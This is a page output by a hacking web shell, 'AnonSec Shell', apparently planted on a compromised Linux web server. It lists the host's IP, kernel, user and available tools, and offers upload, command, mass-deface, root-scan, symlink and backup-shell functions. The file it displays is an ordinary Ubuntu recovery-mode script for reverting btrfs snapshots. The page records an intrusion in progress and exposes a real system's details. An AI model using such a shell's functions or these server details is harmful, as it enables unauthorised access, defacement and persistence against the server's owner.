AnonSec Shell
Server IP : 198.244.165.102  /  Your IP : 216.73.216.218   [ Reverse IP ]
Web Server : nginx/1.24.0
System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : colleary ( 1011)
PHP Version : 8.3.23
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/recovery-mode/options/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/recovery-mode/options/apt-snapshots
#!/bin/bash

set -e

. /lib/recovery-mode/l10n.sh

# check if its there
if [ ! -x /usr/bin/apt-btrfs-snapshot ]; then
    exit 1
fi

# check if its usable, if list returns a non-zero exit code, 
# we probably run on a system with no snapshot support
if ! /usr/bin/apt-btrfs-snapshot list > /dev/null  2>&1; then
    exit 1
fi

# if we make it to this point, show some help
if [ "$1" = "test" ]; then
    echo $(eval_gettext "Revert to old snapshot and reboot")
    exit 0
fi

# get snapshots and show them in whiptail
snapshots=$(apt-btrfs-snapshot list | sed 1d)
tag_item=""
for item in $snapshots; do
    tag_item="$item snapshot $tag_item"
done

choice="$(whiptail --menu "$(eval_gettext "Snapshot")" 15 70 6 $tag_item \
         3>&1 1>&2 2>&3 3>&-)"
# user selected cancel
if [ -z "$choice" ]; then
    exit 0
fi

# set new snapshot and reboot
if apt-btrfs-snapshot set-default "$choice"; then
    reboot
fi


Anon7 - 2022
AnonSec Team